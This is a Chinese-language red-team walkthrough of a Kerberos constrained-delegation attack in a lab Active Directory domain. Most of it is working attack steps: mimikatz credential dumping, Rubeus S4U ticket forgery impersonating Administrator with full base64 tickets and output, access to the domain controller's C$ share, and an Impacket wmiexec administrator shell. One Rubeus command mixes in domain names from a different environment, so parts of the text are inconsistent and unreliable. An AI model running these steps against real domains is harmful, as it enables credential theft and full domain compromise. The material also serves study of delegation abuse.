束性委派攻击
概念:
Windows Server 2003之后微软引入了非约束委派。同时,为了顺利进行约束性委派,微软于2007年为Kerberos的TGS_REQ和 TGS_REP 阶段引入了两个扩展协议:S4u2self(Service for User to Self)
和S4U2proxy(Service for User to Proxy)
。
对于约束性委派,服务账户只能获取该用户对指定服务的ST,从而只能模拟该用户访问特定的服务。配置了约束性委派账户的msDS-AllowedToDelegateTo 属性会指定对哪个SPN进行委派,约束性委派的设置需要SeEnableDelegationPrivilege特权,该特权默认仅授予域管理员和企业管理员。
约束委派有两种:
- 仅使用Kerberos,不能进行协议转换
- 使用任何身份验证协议
S4u2self & S4U2proxy
S4U2self
协议允许服务代表任意用户请求访问自身服务的ST服务票据
S4U2proxy
协议允许服务在已取得ST服务票据下代表任意用户获取另一个服务的服务票据
约束委派限制了S4U2proxy
协议的请求范围,使得配置了委派属性的服务只能模拟用户身份访问特丢你个的其他服务。
配置了约束性委派的账户属性会有如下两个变化:
- 账户
userAccountControl
属性会被设置为TRUSTED_TO_AUTH_FOR_DELEGATION
标志位,值为16781312
。 - 账户
msDS-AllowedToDelegateTo
属性,添加允许委派的服务。
环境介绍:
- ad01 域控 administrator 10.10.10.100
- dc01 域用户 test 普通用户:User 10.10.10.101
在域控上配置约束性委派
计算机用户的约束性委派配置:控制面板\系统和安全\管理工具\Active Directory 用户和计算机(%SystemRoot%\system32\dsa.msc)---> 域名/Computers/名称/属性 ---> 委派 ---> 仅信任此用户作为指定服务的委派(使用任何身份提供验证协议)--->添加--->cifs ad01.sunday.com
同样,对test也配置约束委派,
查询方法:
ADFind:
在普通域用户下执行:
# AdFind.exe查询约束委派机器账户
AdFind.exe -b "DC=sunday,DC=com" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" msds-allowedtodelegateto
# AdFind.exe查询约束委派服务账户
AdFind.exe -b "DC=sunday,DC=com" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto
PowerView:
# 导入
import-module .\powerview.ps1
# PowerView查询约束委派机器账户
Get-NetComputer -TrustedToAuth -domain sunday.club -Properties distinguishedname,useraccountcontrol,msds-allowedtodelegateto|ft -Wrap -AutoSize
# PowerView查询约束委派服务账户
Get-DomainUser –TrustedToAuth -domain sunday.club -Properties distinguishedname,useraccountcontrol,msds-allowedtodelegateto|fl
(1)攻击方法:使用机器账户的Hash值
利用条件:
- 需要Administrator权限
- 目标机器账户配置了约束性委派
实践过程:
# 使用mimikatz获取机器账户NTLM Hash
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
532e9a018289789294a524f8f6f543cc
Rubeus.exe asktgt /user:dc01$ /rc4:532e9a018289789294a524f8f6f543cc /domain:sunday.com /dc:ad01.sunday.com /nowrap
# 使用Rubeus通过S4U2Self协议代表域管理员Administrator请求针对域控LDAP服务的票据,并注入内存
Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/ad2012.sunday.club /dc:DC2016.redteam.lab /ptt /ticket:doIE7DCCBOigAwIBBaEDAgEWooIEBDCCBABhggP8MIID+KADAgEFoQ0bC1JFRFRFQU0uTEFCoiAwHqADAgECoRcwFRsGa3JidGd0GwtyZWR0ZWFtLmxhYqOCA74wggO6oAMCARKhAwIBAqKCA6wEggOoM8VAe67r80K7kucYIn8+7OGwBh7K0P3+J3PvGUYPVlz2+WFR9jNWhQ8SiK0Qwa0uUaZhH6RxZO0GXrW13YcRxuomfopTCDZCq0J5LlAyr+sYq4C+VDR+1n/W8/hMP4rqsdZqfVK7z8jmUhFbB1TGRu7MKuxexQ0Kmr2ae6sH8RmuFEAJHwjS3LXZqtB6AVf3V04fT5PrLatDiLs8DAVHgD18kJwRsF34qjKsC2jsGWeXZkjNsuQFV31HQN0TtAsMR7vftYHag7jYuzmwAvAvKE8fgtoi8Yf6GcFCvKutA65Tc8oSJDG3nd5LdpAuPRPo/SAJn4ujs9SUTjTXWEXNp69uSrdFZ7hR/8yPiZLw1hPoOm3ZlUTGBuUclxep28tDgaA1alBNsH5iAmza1fGj6FUOUoYvRGpC3B4zqs+o2Bd3dNDaHNFcTCc8O6Dcti1q7bhNnLmQZcTq1rTRI0e0mPvPet+xV/obRc2r1qxzjAq5/BhjFu94B+IaolJXoFVoIvz67nSe/h6459xnUPrgqh2PsnwfeakR4CLqcgAbyEOoQV4MWpOJrDgjoBeZ8lfGTY97vIvA0fAuRdqy5L4JX6b+LQxt5fZdCChfMh+YQl1zQs/UYST6UD9xqRvF7l84YGN0lsQYboMHSoZfj4bE2ii1MmrC/18jI/vwZKBjg5aY8MfpTvsSih/IxeVr9YEAOCCsEFFlq7i/UuWP+hiMaGqldqw2eZHwRmobHaJWLmzgErJXYZcRNz84EuLoDdQTWMWpXV8Glr3c+BwPlFOITpwixL8KDKM8PA0kOFok/ci+zlVY/mf3dA6pXmzDKkT0boTczXsOc7zZx4sc34YysY/sSQvqb2sZAvvW1+v1J4N4t8i+/QN1upuk/npqPwDfUhyi7AeO+fcVpCn4ziaNqfebzdh3F3ZmgdrdViTq6I84QACKwzVHH59rjzN81pLuYqGw49B4g3xWYvo1ZA1lJsGGZFa4JwFw3q1fk6Q3qgTGlO0fn/7VFQjtLmJBe6LwtLkTySQsQvZxAHMc8Euc2jZgLGwyR8ViKRo9BmbhYblChJCOrq/14JP2GTHYgMuVx4iSqEVGjnm9/crfWLgbTaSVJ7UChqGzKquer2RuDqNPpcxMPuj9aHfor5ItRhfdnDyni8IQj5zUv4bEBWoRWwyTGk+8UpeGsMbSpEMjoH7q0tw4xyGkTRD/Bz3CWjW/bLtqcB07W2Et9EKTJQh1lzTGNi4GvNhso4HTMIHQoAMCAQCigcgEgcV9gcIwgb+ggbwwgbkwgbagGzAZoAMCARehEgQQRhdvpI6qSFO1Eo5nYZxvZKENGwtSRURURUFNLkxBQqIVMBOgAwIBAaEMMAobCFdJTjEwLTEkowcDBQBA4QAApREYDzIwMjIwNTE4MDkzNTE1WqYRGA8yMDIyMDUxODE5MzUxNVqnERgPMjAyMjA1MjUwOTM1MTVaqA0bC1JFRFRFQU0uTEFCqSAwHqADAgECoRcwFRsGa3JidGd0GwtyZWR0ZWFtLmxhYg==
# 直接dir
dir \\ad2012.sunday.club\c$
坑点:当在cmd下使用Rubeus导入票据的时候会出现资源不足,无法导入的情况,可以尝试在powershell下导入。
C:\Windows\system32>cd C:\
C:\>Rubeus.exe asktgt /user:dc01$ /rc4:532e9a018289789294a524f8f6f543cc /domain:sunday.com /dc:ad01.sunday.com /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.6.4
[*] Action: Ask TGT
[*] Using rc4_hmac hash: 532e9a018289789294a524f8f6f543cc
[*] Building AS-REQ (w/ preauth) for: 'sunday.com\dc01$'
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIEwDCCBLygAwIBBaEDAgEWooID3jCCA9phggPWMIID0qADAgEFoQwbClNVTkRBWS5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCnN1bmRheS5jb22jggOaMIIDlqADAgESoQMCAQKiggOIBIIDhNDqkC1R5wVv3g3s0PiQR969RH7BGNASqsqvjPUrKhSPyliH2V6kLJw6EE0gpm9BQYLkhqQdk04no14APn/+5dBJHTUkhePglUj+/4wpUqYCWub60vBwbPZTjsv1H385JIDH24FnWDEzfhje5WBJMot82zlzU1dHR6Yf19qF7IXkPE545woyT+iyW/+YGhlk+ruFxylIV7PaFkNJxV+RZMnwiZyc+RELDT3qJzblfYHbto9G+OhBtIOJffCHBAUU4ErnxMfXmYcjg5wMbHZOdgSnRL9PGQecWFZXLaw+SuEOPYKuuKlIQnyn+fAsrIsNsoIxxL9YSR0VjTYXMSqOAAgEof12anomanrKxaOal8vAjSxWMHObe4yJCjikce5U0b9hwdTpUeyrIGdLEbRp31/jNRBDYJdD2BSQIw4WsKxfRHgk7y3jJllDQj2x2kLi/ndJ1IyBA10mCrKpLtj60v3bon6bQBziurdOBVAlS3hAKMBDuWR11gnmIrirYqN5BGDlwnNN3+msSi15I/AcuqUpZe28/kVVxgwHd6qUVHh544nfySS/YBDht7saUbKCgDbfn/Qc3mCyDOIWdJe8JDpIyEAiEr/KSt6LXWg8XGqDZMFEZEbYU6DoWtfTTCK9aSWgtiGljRhBiOPa9XgYFPNi6zAF+yPLVhrU9XC/XNmxAOYWonk6vNRaHa9oNaQlMwVMXh4jYxdF1L4l/wxXEet7DSe8KgJpNmGUwzHppAVJuQQO0pTq2q7KHX+SEChT8RwZeDKZgU0ZnupAnH0lbNudb8lh0K4lULRC9shAZn+bXFl5EWgdPVrFdvbrJsk6+DHyBLxXUGdUHItS5ssCi2MuCkgA8jfD8Nrm6xLDQ3mAlLhGxEVJFroX4UwPCNMEIe0YN223fSK3nJoq2MFmgx1YaExZzPUn7OFFupBdQju3vr8TYZM+EvfoRN0deYN9qKqgNfmsHQCOaQf6MQlQk5pVSz40uIzJvhxculH7lMlXNX2s6i7dIgBz41v3CWkRIW7vSkLEqUTl7K5Dnm6W1USgWrDAGTvX2uef9Eui2Zp/8SMcCmyz6QG9iELuxXBzakSDI4FSLSFnJbG/KNX1IEr10fvKvr776dFksbDX+lwIe0Ikg7obNXeWNfLBk4+rfpn3DBhd8im4nkJZd7W9nkO52eoebD77XkBi4lsNWBabHcGJfqOBzTCByqADAgEAooHCBIG/fYG8MIG5oIG2MIGzMIGwoBswGaADAgEXoRIEEHyWyeFMQ7BdxXQi7EZ9zZuhDBsKU1VOREFZLkNPTaISMBCgAwIBAaEJMAcbBWRjMDEkowcDBQBA4QAApREYDzIwMjMwNjA5MDI1OTU1WqYRGA8yMDIzMDYwOTEyNTk1NVqnERgPMjAyMzA2MTYwMjU5NTVaqAwbClNVTkRBWS5DT02pHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCnN1bmRheS5jb20=
ServiceName : krbtgt/sunday.com
ServiceRealm : SUNDAY.COM
UserName : dc01$
UserRealm : SUNDAY.COM
StartTime : 2023/6/9 10:59:55
EndTime : 2023/6/9 20:59:55
RenewTill : 2023/6/16 10:59:55
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : fJbJ4UxDsF3FdCLsRn3Nmw==
C:\>Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/ad01.sunday.com /dc:ad01.sunday.com /ptt /ticket:doIEwDCCBLygAwIBBaEDAgEWooID3jCCA9phggPWMIID0qADAgEFoQwbClNVTkRBWS5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCnN1bmRheS5jb22jggOaMIIDlqADAgESoQMCAQKiggOIBIIDhNDqkC1R5wVv3g3s0PiQR969RH7BGNASqsqvjPUrKhSPyliH2V6kLJw6EE0gpm9BQYLkhqQdk04no14APn/+5dBJHTUkhePglUj+/4wpUqYCWub60vBwbPZTjsv1H385JIDH24FnWDEzfhje5WBJMot82zlzU1dHR6Yf19qF7IXkPE545woyT+iyW/+YGhlk+ruFxylIV7PaFkNJxV+RZMnwiZyc+RELDT3qJzblfYHbto9G+OhBtIOJffCHBAUU4ErnxMfXmYcjg5wMbHZOdgSnRL9PGQecWFZXLaw+SuEOPYKuuKlIQnyn+fAsrIsNsoIxxL9YSR0VjTYXMSqOAAgEof12anomanrKxaOal8vAjSxWMHObe4yJCjikce5U0b9hwdTpUeyrIGdLEbRp31/jNRBDYJdD2BSQIw4WsKxfRHgk7y3jJllDQj2x2kLi/ndJ1IyBA10mCrKpLtj60v3bon6bQBziurdOBVAlS3hAKMBDuWR11gnmIrirYqN5BGDlwnNN3+msSi15I/AcuqUpZe28/kVVxgwHd6qUVHh544nfySS/YBDht7saUbKCgDbfn/Qc3mCyDOIWdJe8JDpIyEAiEr/KSt6LXWg8XGqDZMFEZEbYU6DoWtfTTCK9aSWgtiGljRhBiOPa9XgYFPNi6zAF+yPLVhrU9XC/XNmxAOYWonk6vNRaHa9oNaQlMwVMXh4jYxdF1L4l/wxXEet7DSe8KgJpNmGUwzHppAVJuQQO0pTq2q7KHX+SEChT8RwZeDKZgU0ZnupAnH0lbNudb8lh0K4lULRC9shAZn+bXFl5EWgdPVrFdvbrJsk6+DHyBLxXUGdUHItS5ssCi2MuCkgA8jfD8Nrm6xLDQ3mAlLhGxEVJFroX4UwPCNMEIe0YN223fSK3nJoq2MFmgx1YaExZzPUn7OFFupBdQju3vr8TYZM+EvfoRN0deYN9qKqgNfmsHQCOaQf6MQlQk5pVSz40uIzJvhxculH7lMlXNX2s6i7dIgBz41v3CWkRIW7vSkLEqUTl7K5Dnm6W1USgWrDAGTvX2uef9Eui2Zp/8SMcCmyz6QG9iELuxXBzakSDI4FSLSFnJbG/KNX1IEr10fvKvr776dFksbDX+lwIe0Ikg7obNXeWNfLBk4+rfpn3DBhd8im4nkJZd7W9nkO52eoebD77XkBi4lsNWBabHcGJfqOBzTCByqADAgEAooHCBIG/fYG8MIG5oIG2MIGzMIGwoBswGaADAgEXoRIEEHyWyeFMQ7BdxXQi7EZ9zZuhDBsKU1VOREFZLkNPTaISMBCgAwIBAaEJMAcbBWRjMDEkowcDBQBA4QAApREYDzIwMjMwNjA5MDI1OTU1WqYRGA8yMDIzMDYwOTEyNTk1NVqnERgPMjAyMzA2MTYwMjU5NTVaqAwbClNVTkRBWS5DT02pHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCnN1bmRheS5jb20=
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.6.4
[*] Action: S4U
[*] Action: S4U
[*] Using domain controller: ad01.sunday.com (10.10.10.100)
[*] Building S4U2self request for: 'dc01$@SUNDAY.COM'
[*] Sending S4U2self request
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to 'dc01$@SUNDAY.COM'
[*] base64(ticket.kirbi):
doIFTjCCBUqgAwIBBaEDAgEWooIEYTCCBF1hggRZMIIEVaADAgEFoQwbClNVTkRBWS5DT02iEjAQoAMC
AQGhCTAHGwVkYzAxJKOCBCowggQmoAMCARKhAwIBAaKCBBgEggQUh2ZK89GToGVPmq6lu8WgUgf4oFaP
16neWfZgcl09r/StcPkkQ/fUGCz3Gg/8aUr83J/9cdfWxdvsykraZyp3pigybMnhxJlZLEyED2JPtJvv
S4aN6w4QPLjxbG9pTM/5JVHeVudb+Rjs3Ea4zbiVZMnDJX57Es03ZpJik1Tll4Bb4h7/NteRtZ1Zoziq
hKh9WaJywSNlRayXv03gnfH1gRwAbuJCYMExixNsNcXm9mS5KIRYsKN367wrWXqT0E+MifZ7qtOxttZj
KyRAQcc09ZViOF5pqdy7MzaHfA9Qpm/3WOLVVgNl4jeEb9jQ23a9L7ELeZdIr52R/0s4BB8TyWLHykTK
7xOkxgjGsHreBXb5xzN0KHXFYmK4ByWWEy0Fl2/WrxCyiOUACy2GqW2PT3B+UedFTJqBRu54r1ALfTcp
s87ZAj+XCl6icVzjedxqRky8fnCQ9wEZrazYljqdf+r7P4F1DNSnFEIlNilYBGHNsE4HmYTna0/JgFRe
awosxHFvlVlTQoNMKxtUVrPbBph0p1QiVAW/hF1U+cp7utzRad9Q891/8Z+6p3mlvYwdWfc/S20LlTF7
Zc2RYYatfpiotHdw9Mj0gPG14ibXoSJA/VkDJCXv08fdRU6VmXbsMAwPXwnRw1HSKL5TiVV6yMwWefZ9
750W2VIc7TZ5/Pefq0f3rp2UCAhKD2lZHewlP1oSz8M7iPx/YQh9R7AoEC5+lr1BiACHsB20sVjumIwi
NdXFvcfFwMJ+zJWKAD3DIyaL+zj5hJTNE4wEMSewd2gDZMEH+ipQWHqTPlomo7clyayISeUkpH4lbDKQ
vptK4t7pZ/yQe0+qAWwZB/8uQCWaFL6k7LWhLsc5KBij7OF/RV4xPynYJlNUIxlIyYLCKM8SkBmsnwjB
CnO6rhowDBSzdVY9QOW3YO7soxXxO76lM7O5uDqmegWipp1awIzSLi0xLPX6SU/yjv85IqA2FfSByD1B
iBL/qtfzerRKwFVtCy00gT99/1QF3OUxev4JSNCPUtz2lakuDKL8vOdK+vdFPWpIpBKmouV1hlFGVqDz
qmzrnYw4397Iav0HkUW1+3Ya7Wi/tcGNUCnrrDywLoAEjrIr8C7oF3jlGsZlkxfXkUp75gVg061MjJXs
7vVY3wcCDsOv8u37NVhwGeSy3wmWqvqiPynwYTv2Vqm4GE6bqPqiYXCnxZfzUn3rHo2sePu+dOGanjBN
g9B+TvPbILwIJLLkwC1/mDFPq9E20rYIqp2yb6vH4YdDVYOL0iRNhYBjGQq47sgsrxlKOLdtIlghAeG9
Hvvw2zVDttj59igSBCG+qq+kAsfZ9dg5L8q/u3u/3Bds0hNNLIdEeNoVra9853msukLOBXyBnfRqplVX
2Fyso4HYMIHVoAMCAQCigc0Egcp9gccwgcSggcEwgb4wgbugKzApoAMCARKhIgQgrfJnKAiBSg8tgX6h
Myp/ml3vaIkoI5s7tv+ocnl4SnWhDBsKU1VOREFZLkNPTaIaMBigAwIBCqERMA8bDUFkbWluaXN0cmF0
b3KjBwMFAEChAAClERgPMjAyMzA2MDkwMzAyMjNaphEYDzIwMjMwNjA5MTI1OTU1WqcRGA8yMDIzMDYx
NjAyNTk1NVqoDBsKU1VOREFZLkNPTakSMBCgAwIBAaEJMAcbBWRjMDEk
[*] Impersonating user 'Administrator' to target SPN 'CIFS/ad01.sunday.com'
[*] Using domain controller: ad01.sunday.com (10.10.10.100)
[*] Building S4U2proxy request for service: 'CIFS/ad01.sunday.com'
[*] Sending S4U2proxy request
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'CIFS/ad01.sunday.com':
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
BENJRlMbD2FkMDEuc3VuZGF5LmNvbQ==
[+] Ticket successfully imported!
C:\> dir \\ad01.sunday.com\c$
驱动器 \\ad01.sunday.com\c$ 中的卷没有标签。
卷的序列号是 961F-20FE
\\ad01.sunday.com\c$ 的目录
2013/08/22 23:52 <DIR> PerfLogs
2023/06/07 14:14 <DIR> Program Files
2013/08/22 23:39 <DIR> Program Files (x86)
2023/06/07 09:53 <DIR> Users
2023/06/07 15:08 <DIR> Windows
0 个文件 0 字节
5 个目录 93,420,552,192 可用字节
(2)攻击方法:使用机器账户的Hash值 (getST)
这里使用Impacket工具套件中的getST.py脚本请求服务票据,并利用该脚本通过wmiexec.py工具远程登录。
利用条件:
- 需要Administrator权限
- 目标机器账户配置了约束性委派
实践过程:
# mimikatz获取机器账户NTLM Hash值
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
532e9a018289789294a524f8f6f543cc
# 使用getST申请服务票据
python getST.py -dc-ip 10.10.10.100 -spn CIFS/ad01.sunday.com -impersonate administrator sunday.com/dc01$ -hashes :532e9a018289789294a524f8f6f543cc
# 使用票据远程访问
set KRB5CCNAME=administrator.ccache
# 用wmiexec弹出一个权限为administrator交互式的shell
python3 wmiexec.py -k sunday.com/administrator@ad01.sunday.com -no-pass -dc-ip 10.10.10.100